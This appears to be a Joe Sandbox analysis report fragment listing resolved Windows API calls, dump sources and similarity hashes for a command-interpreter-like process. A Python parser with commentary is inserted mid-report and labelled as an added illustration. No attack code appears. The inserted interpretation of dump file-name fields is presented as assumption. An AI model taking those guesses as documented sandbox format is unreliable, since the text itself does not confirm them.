                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC3514
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC3522
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC3541
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC355E
                                                        • Part of subcall function 00007FF7E1DC36EC: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3715
                                                        • Part of subcall function 00007FF7E1DC36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7E1DC3770
                                                        • Part of subcall function 00007FF7E1DC36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC3791
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                      • String ID:
                                                      • API String ID: 4057327938-0
                                                      • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                      • Instruction ID: 3e8545ec3fa823a1cc6534d335d4c92bceff4caa43f4ce7bc51b22a9974401df
                                                      • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                      • Instruction Fuzzy Hash: 9731E421F0CA02A6E754FB25940227DFAA0EF89741FC48536D90E83391DEBCE804C761
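The function entries on this page list every resolved API call with an absolute "ref:" address inside process 3's memory dump, and each "Memory Dump Source" line names the dump the code was read from. The following Python is an added illustration, not code from the Joe Sandbox report or from Joe Security: it parses one entry of that shape (a constructed sample built from the call lines and dump name shown above) into records and rebases the call-site addresses against the "Offset:" value, which is what you need to find the same call site in the dumped PE once it is loaded in a disassembler. The meaning assigned to the .sdmp name fields (process index, dump number, region base, page protection) is an assumption inferred from the values listed here, not something the report documents, and the "Offset:" value is assumed to be the image base of the dumped module.

```python
"""Parse a Joe Sandbox per-function block (API refs + memory dump source) and
rebase the absolute 'ref:' call-site addresses to RVAs in the dumped image.
Added illustration, not code from the report or from Joe Security."""
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class ApiRef:
    name: str               # imported function, e.g. WriteConsoleW
    module: str             # module or API set it resolved to, e.g. API-MS-WIN-CORE-CONSOLE-L1-1-0
    args: List[str]         # argument list as printed; '?' means the sandbox could not resolve it
    ref: int                # absolute address of the call site in the dump
    subcall: Optional[int]  # callee start when the line is 'Part of subcall function X', else None


@dataclass
class DumpSource:
    name: str         # full .sdmp file name
    proc: int         # 1st name field: process index within the report (assumption)
    dump_id: int      # 2nd name field: dump sequence number (assumption)
    base: int         # 4th name field: start address of the dumped region
    protection: int   # 5th name field: page protection, 0x20 = PAGE_EXECUTE_READ (assumption)
    offset: int       # 'Offset:' value, taken here as the image base of the dumped PE
    is_pe: bool


@dataclass
class FunctionBlock:
    apis: List[ApiRef]
    source: Optional[DumpSource]

    def rva(self, call: ApiRef) -> int:
        """Call-site RVA relative to the image base, usable in the dumped PE."""
        if self.source is None:
            raise ValueError("block has no Memory Dump Source line")
        return call.ref - self.source.offset


# One API reference line.  The bullet is the literal one used in the report.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_.-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
SRC_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-F]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)


def parse_block(text: str) -> FunctionBlock:
    """Turn the text of one function entry into ApiRef records plus its DumpSource."""
    apis: List[ApiRef] = []
    source: Optional[DumpSource] = None
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            sub = m.group("sub")
            apis.append(ApiRef(m.group("name"), m.group("mod"), args,
                               int(m.group("ref"), 16),
                               int(sub, 16) if sub else None))
            continue
        m = SRC_RE.search(line)
        if m:
            fields = m.group("name")[:-len(".sdmp")].split(".")
            source = DumpSource(m.group("name"), int(fields[0]), int(fields[1]),
                                int(fields[3], 16), int(fields[4], 16),
                                int(m.group("off"), 16), m.group("pe") == "true")
    return FunctionBlock(apis, source)


def imports(block: FunctionBlock) -> List[str]:
    """Distinct module!function pairs: the raw material behind the 'API ID' line."""
    return sorted({f"{c.module}!{c.name}" for c in block.apis})


# Constructed sample in the report's shape, using addresses listed on this page.
SAMPLE = """\
APIs
  • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
  • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8), ref: 00007FF7E1DC359C
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7E1DC3491), ref: 00007FF7E1DC3514
• _get_osfhandle.MSVCRT ref: 00007FF7E1DC3522
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7E1DC3491), ref: 00007FF7E1DC3541
Memory Dump Source
• Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
"""

if __name__ == "__main__":
    blk = parse_block(SAMPLE)
    for c in blk.apis:
        where = f" (in subcall {c.subcall:X})" if c.subcall else ""
        print(f"RVA {blk.rva(c):06X}  {c.module}!{c.name}{where}")
    print("imports:", imports(blk))
```

Calls marked "Part of subcall function" belong to a callee, so their RVAs land in that callee's body rather than in the function the entry describes; the `subcall` field keeps that distinction so the two are not confused when matching against a disassembly. The dump named in "Source File" starts at 7FF7E1DB1000 with protection 0x20 (execute-read) while the "Associated" dump at 7FF7E1DB0000 carries 0x02 (read-only), which is the usual layout of a mapped PE (headers, then the code section), and is why rebasing on the "Offset:" value rather than on the region start gives usable RVAs.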
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                      • String ID: KEYS$LIST$OFF
                                                      • API String ID: 411561164-4129271751
                                                      • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                      • Instruction ID: 15e4f702a6037c5ad8a72fc2028f27eaf1e032af54674989ea782079be31238f
                                                      • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                      • Instruction Fuzzy Hash: D9212121E08A0291F718FB25A883379E661FB85795FC0D737C61E872E5DEFCA4448662
                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC0212
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC0228
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC023C
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC0251
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 513048808-0
                                                      • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                      • Instruction ID: fcc2b7138fe407a521bbb367d3afd937f49e7710b4aa7d2889eb9aba7bbcaabe
                                                      • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                      • Instruction Fuzzy Hash: 8921A125D0CB8687E750EB60A58633DFA90FF49755F944636EA0E42294CEFCE448C762
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                      • String ID:
                                                      • API String ID: 4104442557-0
                                                      • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                      • Instruction ID: 1b7cf3d63c506e47a0a5d4220de52bad170906b5e5309d3ed5c3393c0eb9847c
                                                      • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                      • Instruction Fuzzy Hash: EC115122A04F419AEB04EF60E8453B973A4FB09759F801A35EA6D87B94DFBCD5A4C350
                                                      APIs
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                      • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 513048808-0
                                                      • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                      • Instruction ID: 8a8311c55baeaf48295a52ea22bb0b5ee0846ee12747625b4b049beb90639026
                                                      • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                      • Instruction Fuzzy Hash: B7119331E08A42A3EB14EB24A546278FAA0FF49765F849736D92F433D0CEBCE444C752
                                                      APIs
                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DD71F9
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DD720D
                                                      • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DD7300
                                                        • Part of subcall function 00007FF7E1DD5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF7E1DD75C4,?,?,00000000,00007FF7E1DD6999,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD5744
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: OpenSemaphore$CloseErrorHandleLast
                                                      • String ID: _p0$wil
                                                      • API String ID: 455305043-1814513734
                                                      • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                      • Instruction ID: a8d8c3b1667c7a5913d32aa9d24931708e1ac1dc36b80d8ecbecefb97def6430
                                                      • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                      • Instruction Fuzzy Hash: D461E362B1868281EF25EF65D4523B9A3A1FF84B94FD44673DA0E47784EFBCE5018321
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                      • String ID: %s
                                                      • API String ID: 2401724867-3043279178
                                                      • Opcode ID: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                      • Instruction ID: b426d9c9fc565690cd39e0946b6752279f584e9e770a3dcd66dc0ea9e7be16a0
                                                      • Opcode Fuzzy Hash: 740c75b15b64cf7ac9eb9688b57878eb6de44e609a22920e9cf606d70b52c251
                                                      • Instruction Fuzzy Hash: FF51E572A0868695EB21EF21D8027F9B3A0FB49B84F844136DE4D47794EFBCE050C762
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 3849470556-1994581435
                                                      APIs
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DD9A10
                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DD9994
                                                        • Part of subcall function 00007FF7E1DDA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA77A
                                                        • Part of subcall function 00007FF7E1DDA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA839
                                                        • Part of subcall function 00007FF7E1DDA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7E1DD9A82), ref: 00007FF7E1DDA850
                                                      • wcsrchr.MSVCRT ref: 00007FF7E1DD9A62
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                      • String ID: %s=%s$.
                                                      • API String ID: 3242694432-4275322459
                                                      APIs
                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DD54E6
                                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7E1DD552E
                                                        • Part of subcall function 00007FF7E1DD758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7E1DD6999,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD75AE
                                                        • Part of subcall function 00007FF7E1DD758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7E1DD6999,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD75C6
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorLast$CreateCurrentMutexProcess
                                                      • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                      • API String ID: 779401067-630742106
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: CurrentDirectorytowupper
                                                      • String ID: :$:
                                                      • API String ID: 238703822-3780739392
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                      • API String ID: 3677997916-3870813718
                                                      APIs
                                                      Similarity
                                                      • API ID: memsetwcsrchr$wcschr
                                                      • String ID:
                                                      • API String ID: 110935159-0
                                                      APIs
                                                      Similarity
                                                      • API ID: memset$CurrentDirectorytowupper
                                                      • String ID:
                                                      • API String ID: 1403193329-0
                                                      APIs
                                                      • memset.MSVCRT ref: 00007FF7E1DB921C
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DB93AA
                                                        • Part of subcall function 00007FF7E1DB8B20: wcsrchr.MSVCRT ref: 00007FF7E1DB8BAB
                                                        • Part of subcall function 00007FF7E1DB8B20: _wcsicmp.MSVCRT ref: 00007FF7E1DB8BD4
                                                        • Part of subcall function 00007FF7E1DB8B20: _wcsicmp.MSVCRT ref: 00007FF7E1DB8BF2
                                                        • Part of subcall function 00007FF7E1DB8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB8C16
                                                        • Part of subcall function 00007FF7E1DB8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DB8C2F
                                                        • Part of subcall function 00007FF7E1DB8B20: wcschr.MSVCRT ref: 00007FF7E1DB8CB3
                                                        • Part of subcall function 00007FF7E1DC417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC41AD
                                                        • Part of subcall function 00007FF7E1DC3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7E1DB92AC), ref: 00007FF7E1DC30CA
                                                        • Part of subcall function 00007FF7E1DC3060: SetErrorMode.KERNELBASE ref: 00007FF7E1DC30DD
                                                        • Part of subcall function 00007FF7E1DC3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC30F6
                                                        • Part of subcall function 00007FF7E1DC3060: SetErrorMode.KERNELBASE ref: 00007FF7E1DC3106
                                                      • wcsrchr.MSVCRT ref: 00007FF7E1DB92D8
                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB9362
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DB9373
                                                      Similarity
                                                      • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                      • String ID:
                                                      • API String ID: 3966000956-0
                                                      APIs
                                                      Similarity
                                                      • API ID: memset$_setjmp
                                                      • String ID:
                                                      • API String ID: 3883041866-0
                                                      APIs
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DBB4BD
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06D6
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC06F0
                                                        • Part of subcall function 00007FF7E1DC06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC074D
                                                        • Part of subcall function 00007FF7E1DC06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DBB4DB), ref: 00007FF7E1DC0762
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DBB518
                                                      • _wcsicmp.MSVCRT ref: 00007FF7E1DBB58B
                                                      Strings
                                                      Similarity
                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                      • String ID: ELSE$IF/?
                                                      • API String ID: 3223794493-1134991328
                                                      APIs
                                                      Similarity
                                                      • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                      • String ID:
                                                      • API String ID: 1532185241-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 3588551418-0
                                                      • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                      • Instruction ID: 7af5f27f63665c273c834be099fb597d523c44815d1dfd7fb8e0be85c12e58c1
                                                      • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                      • Instruction Fuzzy Hash: 4841B071E086429BE724EB11E44277DF661FF85B81F94813ADA0E47795CEBCE8408B62
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
